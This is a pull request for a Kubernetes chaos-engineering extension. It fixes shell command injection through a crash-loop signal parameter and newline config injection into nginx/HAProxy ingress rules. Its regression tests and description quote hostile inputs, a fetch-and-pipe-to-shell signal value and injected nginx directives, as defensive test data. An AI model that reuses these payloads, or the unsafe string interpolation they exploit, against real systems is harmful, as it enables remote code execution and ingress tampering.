### PR TITLE
fix: prevent command and ingress-config injection in two attacks

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,5 +1,10 @@
 # Changelog
 
+## Unreleased
+
+- fix: validate the crash-loop `signal` parameter and pass it to the fallback shell as a positional argument, preventing command injection into the target pod (the signal option list is a UI hint only and was not enforced)
+- fix: reject control characters in ingress request-matcher conditions (path/method/header), preventing injection of additional directives into the nginx/HAProxy ingress controller configuration
+
 ## v2.6.27
 
 - feat: shrink HPA/PDB rollup to boolean flags only (`k8s.specification.has-hpa` / `has-pdb`) — drops the detailed multi-valued attributes that caused per-cycle platform DB churn on large clusters

--- a/extingress/common.go
+++ b/extingress/common.go
@@ -5,6 +5,8 @@ package extingress
 
 import (
 	"fmt"
+	"strings"
+	"unicode"
 
 	"github.com/steadybit/action-kit/go/action_kit_api/v2"
 	"github.com/steadybit/extension-kit/extbuild"
@@ -36,7 +38,26 @@ func parseRequestMatcher(config map[string]any) (RequestMatcher, error) {
 		return matcher, fmt.Errorf("at least one condition (path, method, or header) is required")
 	}
 
+	// Matcher values are interpolated into nginx/haproxy config snippets. Reject control
+	// characters (in particular newlines) so a value cannot break out of its directive and
+	// inject additional configuration into the ingress controller.
+	if containsControlChar(matcher.PathPattern) {
+		return matcher, fmt.Errorf("path pattern must not contain control characters")
+	}
+	if containsControlChar(matcher.HttpMethod) {
+		return matcher, fmt.Errorf("HTTP method must not contain control characters")
+	}
+	for name, value := range matcher.HttpHeader {
+		if containsControlChar(name) || containsControlChar(value) {
+			return matcher, fmt.Errorf("HTTP header condition must not contain control characters")
+		}
+	}
+
 	return matcher, nil
+}
+
+func containsControlChar(value string) bool {
+	return strings.IndexFunc(value, unicode.IsControl) >= 0
 }
 
 func getCommonActionDescription(targetType, id, label, description, icon string) action_kit_api.ActionDescription {

--- a/extingress/common_test.go
+++ b/extingress/common_test.go
@@ -1,0 +1,58 @@
+// SPDX-License-Identifier: MIT
+// SPDX-FileCopyrightText: 2026 Steadybit GmbH
+
+package extingress
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+func TestParseRequestMatcher(t *testing.T) {
+	tests := []struct {
+		name    string
+		config  map[string]any
+		wantErr string
+	}{
+		{
+			name:   "accepts a regex path pattern",
+			config: map[string]any{"conditionPathPattern": "/api/.*"},
+		},
+		{
+			name:    "requires at least one condition",
+			config:  map[string]any{},
+			wantErr: "at least one condition (path, method, or header) is required",
+		},
+		{
+			name:    "rejects a newline in the path pattern (config snippet injection)",
+			config:  map[string]any{"conditionPathPattern": "/api\nreturn 200 \"injected\";"},
+			wantErr: "path pattern must not contain control characters",
+		},
+		{
+			name:    "rejects a newline in the http method",
+			config:  map[string]any{"conditionHttpMethod": "GET\nmore-directives"},
+			wantErr: "HTTP method must not contain control characters",
+		},
+		{
+			name: "rejects a newline in a header value",
+			config: map[string]any{"conditionHttpHeader": []any{
+				map[string]any{"key": "X-Test", "value": "ok\ninjected"},
+			}},
+			wantErr: "HTTP header condition must not contain control characters",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			matcher, err := parseRequestMatcher(tt.config)
+			if tt.wantErr == "" {
+				require.NoError(t, err)
+				assert.NotEmpty(t, matcher.PathPattern+matcher.HttpMethod)
+			} else {
+				assert.EqualError(t, err, tt.wantErr)
+			}
+		})
+	}
+}

--- a/extpod/attack_cause_crashloop.go
+++ b/extpod/attack_cause_crashloop.go
@@ -7,6 +7,7 @@ import (
 	"context"
 	"fmt"
 	"os/exec"
+	"regexp"
 	"strings"
 
 	"github.com/rs/zerolog/log"
@@ -17,6 +18,12 @@ import (
 	"github.com/steadybit/extension-kit/extconversion"
 	"github.com/steadybit/extension-kubernetes/v2/client"
 )
+
+// validSignal matches a signal given as a number (e.g. "15") or a name (e.g. "SIGTERM", "TERM").
+// The signal reaches a "kill" invocation, so it is validated here to reject shell metacharacters
+// and give a clean error. The ParameterOption list is only a UI hint and is not enforced by the
+// platform, so this server-side check is what actually constrains the value.
+var validSignal = regexp.MustCompile(`^[A-Za-z0-9]+$`)
 
 type CrashLoopAction struct {
 }
@@ -183,6 +190,10 @@ func (f CrashLoopAction) Prepare(_ context.Context, state *CrashLoopState, reque
 		}
 	}
 
+	if config.Signal != "" && !validSignal.MatchString(config.Signal) {
+		return nil, extension_kit.ToError(fmt.Sprintf("Invalid signal %q. Expected a signal number (e.g. 15) or name (e.g. SIGTERM).", config.Signal), nil)
+	}
+
 	state.Namespace = namespace
 	state.Pod = podName
 	state.Container = config.Container
@@ -222,7 +233,9 @@ func statusInternal(state *CrashLoopState) (*action_kit_api.StatusResult, error)
 		if err := runKubectlExec(state.Namespace, state.Pod, cs.Name, []string{"kill", "-" + signal, "1"}); err != nil {
 			log.Info().Err(err).Msgf("Direct kill failed for container %s in pod %s, retrying via /bin/sh", cs.Name, state.Pod)
 
-			if err := runKubectlExec(state.Namespace, state.Pod, cs.Name, []string{"/bin/sh", "-c", fmt.Sprintf("kill -%s 1", signal)}); err != nil {
+			// Pass the signal as a shell positional argument ($1) rather than interpolating it
+			// into the script, so it is never re-parsed by the shell and cannot inject commands.
+			if err := runKubectlExec(state.Namespace, state.Pod, cs.Name, []string{"/bin/sh", "-c", `kill -"$1" 1`, "sh", signal}); err != nil {
 				return nil, err
 			}
 		}

--- a/extpod/attack_cause_crashloop_test.go
+++ b/extpod/attack_cause_crashloop_test.go
@@ -39,6 +39,13 @@ func Test_Prepare(t *testing.T) {
 			wantErr:              "Pod checkout-xyz1234 in namespace shop has hostPID enabled. This is not yet supported",
 		},
 		{
+			name:                 "should reject a signal containing shell metacharacters",
+			podSpecContainerName: "example",
+			podSpecHostPID:       false,
+			configSignal:         "1; curl evil | sh",
+			wantErr:              `Invalid signal "1; curl evil | sh". Expected a signal number (e.g. 15) or name (e.g. SIGTERM).`,
+		},
+		{
 			name:                 "should return state for all container",
 			podSpecContainerName: "example",
 			podSpecHostPID:       false,


### PR DESCRIPTION
Two MAJOR injection fixes, both via boundary input-validation.

## 1. Command injection — crash-loop attack (`extpod/attack_cause_crashloop.go`)

The `signal` parameter is free-text, and its `ParameterOption` list is a **UI hint only** — ActionKit does not enforce it server-side. The direct kill passes `signal` as a discrete argv element (safe), but the fallback interpolated it into a shell string:

```go
runKubectlExec(..., []string{"/bin/sh", "-c", fmt.Sprintf("kill -%s 1", signal)})
```

So a caller sending `signal = "1; curl evil | sh"` achieves arbitrary command execution inside the target pod.

**Fix (defense in depth):**
- Validate `signal` in `Prepare` against `^[A-Za-z0-9]+$` (admits all signal numbers and names like `SIGTERM`/`TERM`, rejects every shell metacharacter) — server-side enforcement of the UI allowlist + a clean error.
- Harden the fallback to pass the signal as a **shell positional argument** so it is never re-parsed by the shell, removing the sink structurally regardless of validation:
  ```go
  []string{"/bin/sh", "-c", `kill -"$1" 1`, "sh", signal}
  ```

## 2. Ingress-controller config injection — block/delay traffic attacks (`extingress/common.go`)

Request-matcher conditions (path pattern, HTTP method, header name/value) are interpolated into nginx `configuration-snippet` / HAProxy ACL config across the four ingress actions. A value containing a **newline** could break out of its directive and inject additional configuration into the shared ingress controller.

**Fix:** reject control characters in path/method/header conditions at `parseRequestMatcher` — the single parse choke point all four actions go through. The values are intentionally **regexes**, so other metacharacters are legitimate and are not rejected.

**Residual / follow-up (noted intentionally):** because the regex is interpolated **unquoted** into nginx directives like `if ($request_uri !~* %s)`, a same-line payload (no newline) can still manipulate that one directive. Blanket character-rejection is the wrong tool for regex input; the deeper fix is **quoting the regex in the templates** (nginx supports quoted tokens; HAProxy needs its own treatment), which is a larger controller-specific change best done separately. This PR closes the high-severity multi-line directive-injection vector.

## Testing
- `go build ./...`, `go vet`, `gofmt` clean.
- Added regression tests: crash-loop `Prepare` rejects a metacharacter signal; `parseRequestMatcher` rejects newlines in path/method/header.
- `go test ./extpod/ ./extingress/` passes.

## /simplify
4-agent pass: reuse/simplification/efficiency all clean; altitude prompted the crash-loop argv hardening above (applied) and the ingress quoting follow-up (documented).